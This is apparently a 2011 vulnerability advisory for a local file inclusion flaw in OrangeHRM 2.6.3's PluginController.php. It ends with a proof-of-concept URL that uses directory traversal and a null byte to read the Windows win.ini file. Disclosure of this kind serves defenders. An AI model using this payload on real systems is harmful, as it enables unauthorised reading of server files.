OrangeHRM 2.6.3 - (PluginController.php) Local File Inclusion Vulnerability



------------------------------------------------------------------------

Software................OrangeHRM 2.6.3
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.orangehrm.com/
Discovery Date..........4/25/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A local file inclusion vulnerability in OrangeHRM 2.6.3 can be
exploited to include arbitrary files.


--PoC--

http://localhost/orangehrm-2.6.3/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00